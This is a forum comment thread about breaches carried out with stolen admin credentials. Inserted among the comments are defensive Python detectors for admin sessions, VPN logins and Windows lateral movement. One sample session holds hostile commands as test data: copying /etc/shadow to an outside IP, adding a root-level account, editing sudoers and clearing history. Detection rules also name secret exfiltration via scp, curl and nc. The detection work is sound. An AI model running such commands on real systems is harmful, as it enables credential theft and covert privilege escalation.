3l33t haxxors don't need no botnet, they just pinch passwords

Half of all breaches Dell's SecureWorks outfit has responded to over the last year have been a result of attackers using legitimate admin tools and stolen credentials. Dell's threat research unit says the "living off the land" hack tactic makes security controls that seek malware and hacking infrastructure redundant, …

  1. Anonymous Coward

    User Monitoring

    It strikes me that, if stolen admin credentials are a significant cause of breach, the approach to monitoring user activity should focus as much on what the administrators are doing as on what the ordinary users are doing. Maybe more so.

    1. Patrick R

      Re: User Monitoring

      But who will monitor the administrator's activity? ...

      1. Vic

        Re: User Monitoring

        But who will monitor the administrator's activity?

        Me, of course.

        Vic.

        1. tony2heads

          Re: User Monitoring

          But I will then have to monitor you, Vic

          1. Sir Runcible Spoon

            Re: User Monitoring

            Can someone tell me how these hackers bypassed the 2FA that should be standard for remote admin access into any business network?


      2. Peter Gathercole

        Re: User Monitoring

        All the organisations subject to Sarbanes Oxley must have full auditing for their privileged accounts, with the audit logs scrutinised by people other than the administrators themselves, preferably in a completely different management stream.

        It's a little tricky to arrange, but it certainly could be done when the main admin interfaces were CLI. It could also be done for X11 sessions, by effectively inserting something like XScope in recording mode in the path.

        Mind you, as someone who took a spell doing it, reading through someone else's admin session was a painful task that you had to take frequent breaks from if you wanted to maintain your sanity.

        I have no idea how it is done now with remote GUI sessions, although I'm sure that it must be being done.
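The review burden described above is the usual objection to recorded admin sessions. The following is an added example, not code from the commenter or from the article: a first-pass triage of a `script`-style typescript that strips terminal escape codes, pulls out the commands typed at a root prompt, and flags the ones a second reviewer should actually read. The sample session, host names, addresses and the rule list are all constructed for the example.

```python
"""Triage a recorded privileged CLI session so a second reviewer can skim it."""
import re
from collections import Counter

# Constructed sample typescript (the kind of file `script` or a sudo I/O log produces),
# with ANSI colour codes and command output interleaved. Hosts, users and IPs are made up.
SAMPLE_TYPESCRIPT = (
    "Script started on 2015-06-01 09:12:04\n"
    "\x1b[01;32mroot@db01\x1b[00m:\x1b[01;34m~\x1b[00m# tail -n 2 /var/log/auth.log\n"
    "Jun  1 09:11:58 db01 sshd[2211]: Accepted publickey for ops from 10.1.2.3\n"
    "root@db01:~# useradd -o -u 0 -g 0 svc_backup2\n"
    "root@db01:~# passwd svc_backup2\n"
    "root@db01:~# echo 'svc_backup2 ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers\n"
    "root@db01:~# scp /etc/shadow 203.0.113.9:/tmp/\n"
    "root@db01:~# history -c\n"
    "root@db01:~# exit\n"
    "Script done on 2015-06-01 09:14:40\n"
)

# CSI escape sequences (colours, cursor movement) that litter a raw typescript
ANSI_RE = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]")
# user@host:cwd followed by '#' (root) or '$', then the command that was typed
PROMPT_RE = re.compile(r"^(?P<who>\S+@\S+):(?P<cwd>\S*)[#$] (?P<cmd>.+)$")

# Rule name -> pattern. Chosen for this example; a real list is tuned to the estate.
RISK_RULES = [
    ("uid0-account-created", re.compile(r"\buseradd\b.*(-o\b|-u\s*0\b)")),
    ("credential-change", re.compile(r"\b(passwd|chpasswd)\b")),
    ("sudoers-modified", re.compile(r"/etc/sudoers|\bvisudo\b")),
    ("secret-file-exfil", re.compile(r"\b(scp|rsync|curl|nc)\b.*(/etc/shadow|\.ssh/|\.pem\b)")),
    ("history-tampering", re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bHISTSIZE=0\b")),
    ("persistence", re.compile(r"\bcrontab\b|/etc/rc\.local|\bsystemctl\s+enable\b")),
]


def strip_ansi(text: str) -> str:
    """Remove terminal escape sequences so prompts and commands match cleanly."""
    return ANSI_RE.sub("", text)


def extract_commands(typescript: str) -> list:
    """Return the commands typed at a prompt, ignoring the interleaved output."""
    commands = []
    for line in strip_ansi(typescript).splitlines():
        m = PROMPT_RE.match(line.rstrip("\r"))
        if m:
            commands.append({"who": m["who"], "cwd": m["cwd"], "cmd": m["cmd"].strip()})
    return commands


def classify(cmd: str) -> list:
    """Names of every risk rule the command matches (empty list if none)."""
    return [name for name, rule in RISK_RULES if rule.search(cmd)]


def triage(typescript: str) -> list:
    """Only the commands a reviewer must look at, each with its rule hits."""
    findings = []
    for entry in extract_commands(typescript):
        flags = classify(entry["cmd"])
        if flags:
            findings.append({**entry, "flags": flags})
    return findings


def summarize(findings: list) -> Counter:
    """How many commands hit each rule, for the cover sheet of the review."""
    return Counter(flag for f in findings for flag in f["flags"])


if __name__ == "__main__":
    hits = triage(SAMPLE_TYPESCRIPT)
    for f in hits:
        print(f"{f['who']:<12} {', '.join(f['flags']):<22} {f['cmd']}")
    print(dict(summarize(hits)))
```

The reviewer still owns the decision; the point is that a two-minute session with a `history -c` and a copy of `/etc/shadow` leaving the box does not get lost among pages of `ls` output. Commands typed at a non-standard prompt, or inside a nested shell whose prompt the regex does not recognise, would be missed, so the prompt pattern must match what the estate's shells actually print.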

        1. Wzrd1

          Re: User Monitoring

          "All the organisations subject to Sarbanes Oxley must have full auditing for their privileged accounts, with the audit logs scrutinised by people other than the administrators themselves, preferably in a completely different management stream."

          I work for a Fortune 200 corporation that is global. I'm one of the poor folks who get to monitor our logger, network taps and e-mail system (I can retrieve suspect mail to remove phish and malware attachments, as well as spam; I can't read the mail though, thankfully. I did that when I was working with the US DoD, when things were suspicious).

          One problem: when logs from a global corporation aggregate, they require massive storage and massive database processing capabilities. That means that on occasion the logger reporting arrives up to six hours after the suspicious events have occurred.

          Worse, incident response is spottily 24/7/365, resulting in delays in response, by which time the attack is long over: a webshell used, RDP through the shell, a pass-the-hash attack used, AD trees dumped, etc., in minutes.

          Even when everyone's in the office, when the attack is viewed by the web taps and observed as it happens, getting the message to the manager and server admin still takes long enough that the attack is over.

          We've had external "eyes" review the problem; 2-factor was not adopted due to the cost to the corporation. Even after a few SOX audits.

          We've gotten new tools to help catch the breach, but nothing can speed response in a truly global corporation - *someone* is in bed during an attack and China has plenty of time to breach in.

  2. Alistair

    Simple enough

    If admin creds are getting stolen you have issues with your admins not keeping things tidy. If your admins have these issues, I don't wanna know what else is going down the toilet.

    I've had a couple of days where security has called me because I've been WFH, gone out for lunch and had to pop on to sort a quick issue, usually from a hotspot - this pops a bell in the VPN logs. How hard is that? Is this not a starting point? I can imagine that an admin losing control of a laptop/work desktop is one thing... I suspect it would get *me* at least *fired* if I got some sort of viral infection on my work laptop.
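The "bell in the VPN logs" above is a baseline check: a privileged account authenticating from a source network that account has never used. As an added example (not the commenter's code, and not from any particular VPN product), here is that check over a few constructed log lines in a made-up `key=value` format; the admin list, the per-user baseline networks and every address are assumptions for the example.

```python
"""Flag privileged-account VPN logins from outside each admin's known networks."""
import ipaddress
import re

# Constructed log lines in a made-up key=value format; real VPN concentrators differ.
SAMPLE_VPN_LOG = """\
2015-06-03T12:41:10Z vpn01 login user=alistair src=198.51.100.23 result=success
2015-06-03T13:05:42Z vpn01 login user=alistair src=203.0.113.45 result=success
2015-06-03T13:06:01Z vpn01 login user=jbloggs src=203.0.113.46 result=success
2015-06-03T13:10:17Z vpn01 login user=ops_root src=192.0.2.9 result=failure
2015-06-03T13:11:30Z vpn01 login user=ops_root src=2001:db8::1 result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<vpn>\S+) login user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)$"
)

# Assumed: which accounts carry admin rights, and which networks each one normally
# connects from (office range, home ISP range). An admin with no baseline always alerts.
ADMINS = {"alistair", "ops_root"}
BASELINE = {
    "alistair": ["198.51.100.0/24", "192.0.2.0/24"],
    "ops_root": ["192.0.2.0/24"],
}


def parse_line(line: str):
    """Parse one log line into a dict, or None if it is not a login record."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def in_baseline(src: str, networks: list) -> bool:
    """True if src falls inside any of the given CIDR ranges (v4 and v6 both handled;
    a v6 address never matches a v4 network and vice versa)."""
    ip = ipaddress.ip_address(src)
    return any(ip in ipaddress.ip_network(n) for n in networks)


def off_baseline_logins(lines, admins: set, baseline: dict) -> list:
    """Successful logins by admin accounts from outside their known networks.
    Failures are left to the brute-force rules; non-admin accounts are out of scope here."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["result"] != "success" or rec["user"] not in admins:
            continue
        if not in_baseline(rec["src"], baseline.get(rec["user"], [])):
            alerts.append({"ts": rec["ts"], "user": rec["user"], "src": rec["src"]})
    return alerts


if __name__ == "__main__":
    for a in off_baseline_logins(SAMPLE_VPN_LOG.splitlines(), ADMINS, BASELINE):
        print(f"{a['ts']} admin {a['user']} connected from off-baseline source {a['src']}")
```

The admin working from a café hotspot trips this on purpose, which is the commenter's point: the alert is cheap, and a phone call confirms it in a minute. The same record from an account whose owner is asleep is the case the thread is about.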

    1. Wzrd1

      Re: Simple enough

      "If admin creds are getting stolen you have issues with your admins not keeping things tidy. If your admins have these issues, I don't wanna know what else is going down the toilet."

      We're global, we have thousands of exit nodes we monitor, as well as log aggregators, network taps, HIPS, IPS and more.

      We see webshells created from an unknown entry point, lateral spread via RDP sessions, notepad used as a tool-depositing tool, the resultant script run, which installed more tools, then pass-the-hash uncovers admin accounts on that box, then those are used to enter Active Directory and raise merry hell quietly on the network.

      Incident response teams try to contact that distant manager and admin, to learn that it's between 1 and 3 AM and nobody can respond.

      Or the server is a critical server room pet, which takes days to get off of the network.

      The bugger even got into our antivirus server, software inventory server and more.

      The adversary knows the network well now, knows when response will be slow and capitalized upon that repeatedly.

      2FA would help a lot, but corporate doesn't want to spend the money, as we're talking global 2FA for 100K users.

      I could write a script that could follow the SOB back to the ingress point, terminating his connections and installing itself on the lateral spread points, but the script would have to have a global admin privilege set and that is a greater security risk.
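The chain the commenter describes (RDP hop from the compromised box, then pass-the-hash fanning out to other hosts) leaves a recognisable shape in Windows Security event 4624 even when every tool used is a legitimate admin tool. As an added example, not from the commenter or the article, the code below runs two heuristics over constructed 4624 records: an account making NTLM network logons (LogonType 3) to many distinct hosts from one source within a few minutes, and RDP logons (LogonType 10) whose destination becomes the source of a later RDP logon. The events, host names, addresses and thresholds are all made up for the example; the field names follow the 4624 event XML.

```python
"""Two detections over parsed Windows Security 4624 events: NTLM fan-out and RDP chains."""
from collections import defaultdict
from datetime import datetime, timedelta


def ev(t, computer, user, logon_type, pkg, ip):
    """Build one parsed 4624 record (field names as in the event XML)."""
    return {"t": t, "EventID": 4624, "Computer": computer, "TargetUserName": user,
            "LogonType": logon_type, "AuthenticationPackageName": pkg, "IpAddress": ip}


# Constructed sample, all UTC. web01 is the webshell host; the attacker RDPs to app02,
# sprays NTLM network logons from app02 with a harvested account, then RDPs to dc01.
EVENTS = [
    ev("2015-06-06T01:02:10", "web01", "iis_app", 3, "Kerberos", "10.0.5.21"),   # benign
    ev("2015-06-06T01:10:31", "app02", "localadmin", 10, "Negotiate", "10.0.1.10"),  # RDP web01->app02
    ev("2015-06-06T01:15:02", "fs01", "svc_backup", 3, "NTLM", "10.0.1.20"),
    ev("2015-06-06T01:15:40", "fs02", "svc_backup", 3, "NTLM", "10.0.1.20"),
    ev("2015-06-06T01:16:55", "sql01", "svc_backup", 3, "NTLM", "10.0.1.20"),
    ev("2015-06-06T01:18:12", "dc01", "svc_backup", 3, "NTLM", "10.0.1.20"),
    ev("2015-06-06T01:19:03", "av01", "svc_backup", 3, "NTLM", "10.0.1.20"),
    ev("2015-06-06T01:22:45", "dc01", "svc_backup", 10, "Negotiate", "10.0.1.20"),  # RDP app02->dc01
    ev("2015-06-06T01:30:00", "fs01", "jsmith", 3, "NTLM", "10.0.9.77"),         # benign, one host
]

# Assumed asset inventory so a source IP can be named as a host
HOST_IP = {"web01": "10.0.1.10", "app02": "10.0.1.20", "fs01": "10.0.2.11", "fs02": "10.0.2.12",
           "sql01": "10.0.3.5", "dc01": "10.0.0.4", "av01": "10.0.4.9"}
IP_HOST = {ip: host for host, ip in HOST_IP.items()}


def parse_time(s: str) -> datetime:
    return datetime.fromisoformat(s)


def ntlm_fanout(events, min_hosts=4, window=timedelta(minutes=10)) -> list:
    """(account, source) pairs whose NTLM network logons reach >= min_hosts distinct
    hosts inside `window`. A heuristic for pass-the-hash lateral movement; scheduled
    admin scripts produce the same shape, so known sources need a baseline."""
    by_pair = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] == 3 and e["AuthenticationPackageName"] == "NTLM":
            by_pair[(e["TargetUserName"], e["IpAddress"])].append((parse_time(e["t"]), e["Computer"]))
    findings = []
    for (user, src), hits in by_pair.items():
        hits.sort()
        best, span, lo = set(), None, 0
        for hi in range(len(hits)):            # sliding time window over the sorted hits
            while hits[hi][0] - hits[lo][0] > window:
                lo += 1
            hosts = {h for _, h in hits[lo:hi + 1]}
            if len(hosts) > len(best):
                best, span = hosts, (hits[lo][0], hits[hi][0])
        if len(best) >= min_hosts:
            findings.append({"user": user, "source": IP_HOST.get(src, src),
                             "hosts": sorted(best), "first": span[0], "last": span[1]})
    return findings


def rdp_chains(events) -> list:
    """Interactive RDP logons (type 10) linked where one hop's destination is the
    source of a later hop, e.g. web01 -> app02 -> dc01."""
    hops = sorted((parse_time(e["t"]), IP_HOST.get(e["IpAddress"], e["IpAddress"]),
                   e["Computer"], e["TargetUserName"])
                  for e in events if e["EventID"] == 4624 and e["LogonType"] == 10)
    chains = []
    for i, (_, src1, dst1, user1) in enumerate(hops):
        for _, src2, dst2, user2 in hops[i + 1:]:
            if src2 == dst1:
                chains.append({"path": [src1, dst1, dst2], "accounts": [user1, user2]})
    return chains


if __name__ == "__main__":
    for f in ntlm_fanout(EVENTS):
        print(f"NTLM fan-out: {f['user']} from {f['source']} to {f['hosts']} "
              f"in {f['last'] - f['first']}")
    for c in rdp_chains(EVENTS):
        print("RDP chain:", " -> ".join(c["path"]), "using", c["accounts"])
```

Neither rule needs the attacker's tools to be recognised as malware, which is the point of the article: the logons are real logons with real credentials, and what gives them away is the pattern across hosts. The six-hour aggregation lag mentioned earlier in the thread is the practical problem; on the sample above the whole chain fits inside twenty minutes, so the rule has to run close to the domain controllers rather than on yesterday's batch.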

  3. Chunky Lafunga

    Muppets

    Recent pen test at our place, and of 800 about 120 replied to phishing emails from a faked Help Desk email asking for their credentials as there had been a security breach.

    Scary was that most of these muppets were in sensitive high-grade positions such as Legal/Finance/HR/IT.

    They completely gave themselves up and even kept on replying to the sender asking what they should do next. One idiot thought the phishing email was the new Help Desk email and started CCing emails about upcoming events in our conference centre, which often host senior UK and foreign VIPs, Royals and such. Nothing was done about it.

    1. Wzrd1

      Re: Muppets

      "Recent pen test at our place, and of 800 about 120 replied to phishing emails from a faked Help Desk email asking for their credentials as there had been a security breach."

      Our organization is a lot larger, a similar test was performed, a bit over 50% reported the phish attempt to security. We're working on improving that number.

      We still have a way to go, as I noted a *.pdf.scr executing and running msiexec successfully just this past weekend.

      It looks like the sales department is in need of remedial training. :/

    2. fajensen

      Re: Muppets

      Scary was that most of these muppets were in sensitive high-grade positions such as Legal/Finance/HR/IT.

      Contrary to common belief, stupidity is evenly distributed in any population one could care to check.

      There will be university professors, presidents, politicians, tech-evangelists, CEx's and even Nobel Prize Winners - who are just stupid. Dumb as a sack of broken hammers!

      This creates several problems, the most obvious being:

      1) That the impact of their stupidity scales with their influence and position.

      2) Most people refuse to believe when their senses are telling them that the VIP in front of them is really a retard and should be managed accordingly.

      3) Sociopaths have no trouble at all; a high-level moron is gold for them and certain ruin for everyone else.

      4) Every stupid VIP will need a "Sir/Dame Humphrey" to mitigate their retarded-ness (which is why the boss's secretary is generally a force to be reckoned with)!
